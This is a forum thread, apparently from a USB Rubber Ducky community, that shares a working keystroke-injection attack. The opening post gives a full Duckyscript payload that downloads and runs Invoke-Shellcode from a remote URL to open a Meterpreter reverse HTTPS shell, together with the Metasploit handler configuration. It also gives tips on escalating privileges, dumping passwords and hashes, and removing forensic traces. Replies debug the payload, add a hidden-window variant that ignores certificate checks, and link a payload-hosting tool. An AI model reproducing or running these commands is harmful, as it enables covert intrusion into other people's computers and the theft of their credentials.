Xcellerator Posted September 26, 2013 Posted September 26, 2013 Hey guys, I've been playing around with powershell and also been looking into Powersploit (I really suggest you look into powersploit - its got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a ducky script! First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in metasploit below. DELAY 5000 GUI r DELAY 500 STRING cmd ENTER STRING cd %TEMP% ENTER STRING copy con met.cmd ENTER STRING start C:/Windows/System32/Ribbons.scr /s ENTER STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force" ENTER CTRL z ENTER DELAY 100 STRING met.cmd && exit ENTER Just make sure you remember to change <IP_ADDRESS> to your actual IP Address and <PORT> to the port you want to run the session over. Now, in a terminal window in a linux distro (make sure you have metasploit installed), make a file with this as it's contents, obviously changing the values in < and > to match your settings: use exploit/multi/handler set payload windows/meterpreter/reverse_https set LHOST <IP_ADDRESS> set LPORT <PORT> exploit -j -z name it whatever you want with a .rc extension. ### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL### Run this in the terminal: msfconsole -r ./fileyoujustmade.rc Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permissions problems if you try and use port 443 on Debian systems without being root). Now, run the payload from the ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky. It may take up to 10 seconds for you to receive your shell as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the meterpreter into memory. Issues I occured: I found that my metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit enter to get the msf prompt back, and then connect into the meterpreter session and run smart_migrate automatically. Smart_migrate can be found at post/windows/manage/smart_migrate in the metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe which ##DOES NOT## have an administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (If you want to dump firefox/chrome/IE passwords, hashes or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower security environments. For the Forensics Conscious: If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps: 1. Delete met.cmd from %TEMP% - You don't want to come back to bite you on the ass once you're done with the machine. 2. Kill the powershell.exe process once you've migrated out of it. Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P Quote
TeCHemically Posted October 4, 2013 Posted October 4, 2013 Very nice! I am having issues though. When the powershell command is entered a ton of red text flies by and the window disappears. No shell results. Sorry I don't have more information. Any help and direction is appreciated! Quote
hzm74 Posted October 9, 2013 Posted October 9, 2013 I too have the red tekst in the command screen. Other question: does the attacked computer needs to be logged in as an admin to let this work? Thnx Quote
b00stfr3ak Posted October 9, 2013 Posted October 9, 2013 I have not tried this script but you might need to change your execution policy. I believe by default the execution policy is set to Restricted by default so you can not execute any powershell scripts. You can check this by executing Get-ExecutionPolicy. To get this script to work try to execute Set-ExecutionPolicy Unrestricted or Set-ExecutionPolicy Unrestricted -force but you must be an admin to do this. Quote
Xcellerator Posted October 9, 2013 Author Posted October 9, 2013 Yeah, I'm pretty sure it's an execution policy issue. Try appending "-ep bypass" just after "powershell". If it works, let me know and I'll update the original post. Quote
hzm74 Posted October 10, 2013 Posted October 10, 2013 So the target machine needs to be logged in as an admin to let this work? Quote
b00stfr3ak Posted October 11, 2013 Posted October 11, 2013 (edited) I just tested the powershell command and confirmed it works with out any problems. Can you post the errors you are getting? Admin is not needed, and my execution policy is set to Restricted. I thought it downloaded the script and then you had to run it. Looks like powershell keeps the script in memory and you can call the functions from there pretty sweet. Edited October 11, 2013 by b00stfr3ak Quote
Xcellerator Posted October 11, 2013 Author Posted October 11, 2013 Oh, good. I'd thought I'd tested it on a machine with Restricted Execution Policy, but I assumed I'd got it wrong from the errors people are getting. Not to sound silly, but you are changing <IP_ADDRESS> and <PORT> to actual values, aren't you? Quote
b00stfr3ak Posted October 11, 2013 Posted October 11, 2013 I'm going to add a version of this to my power-ducky tool kitpowershell -windowstyle hidden "[system.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };IEX (New-Object Net.WebClient).DownloadString('https://172.26.4.38:8080/')" It will create a https server socket and then the client will grab the powershell script and run it with a hidden window. Quote
hzm74 Posted October 12, 2013 Posted October 12, 2013 (edited) Hello, These are the "red"-lines i'm getting: C:\Users\*****>powershell ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.109 -Lport 8080 -Force"The term 'ÏEX' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.At line:1 char:4+ ÏEX <<<< (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.109 -Lport 8080 -Force + CategoryInfo : ObjectNotFound: (ÏEX:String) [], CommandNotFound Exception + FullyQualifiedErrorId : CommandNotFoundException The term 'Invoke-Shellcode' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.At line:1 char:89+ ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode <<<< -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.109 -Lport 8080 -Force + CategoryInfo : ObjectNotFound: (Invoke-Shellcode:String) [], Co mmandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException Thnx !! I believe it is the following: 'IEX' is changed to 'ÏEX' This might be a keyboard language problem? Any help suggestions? Edited October 12, 2013 by hzm74 Quote
Xcellerator Posted October 12, 2013 Author Posted October 12, 2013 Yeah, it looks like a keyboard encoder issue. It should be "IEX", not ÏEX. Have you ever has this issue before? Quote
hzm74 Posted October 12, 2013 Posted October 12, 2013 solved it by adding a space after the ". I have US-international. But, problem solved. Quote
hzm74 Posted October 12, 2013 Posted October 12, 2013 I can confirm it works when tested machine is logged in as an admin. Will try now with user account. Quote
Xcellerator Posted October 12, 2013 Author Posted October 12, 2013 As long as powershell is permitted for standard users, it shouldn't be a problem running as non-admin. This is most likely the case for personal machines. However, in a domain environment, you'd be bloody lucky if powershell were available to anyone except local and domain admins, so you're basically out of luck. Unless you have access to a server room for a minute or so.. :-P Quote
b00stfr3ak Posted October 15, 2013 Posted October 15, 2013 Created a quick script that will allow you to use any server to host the powershell script and any powershell script to execute on the victims computer. The web server that the script will set up is real basic and you can use http or https. You can also add a real cert if you want, right now it is just a self-sign. I doesn't set anything up for the ducky yet, that will come soon. Working on something else right now that has me a little stuck (transferring 40MB of data using powershell and ssl). But this will be added by this weekend. https://github.com/b00stfr3ak/fast_meterpreter Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.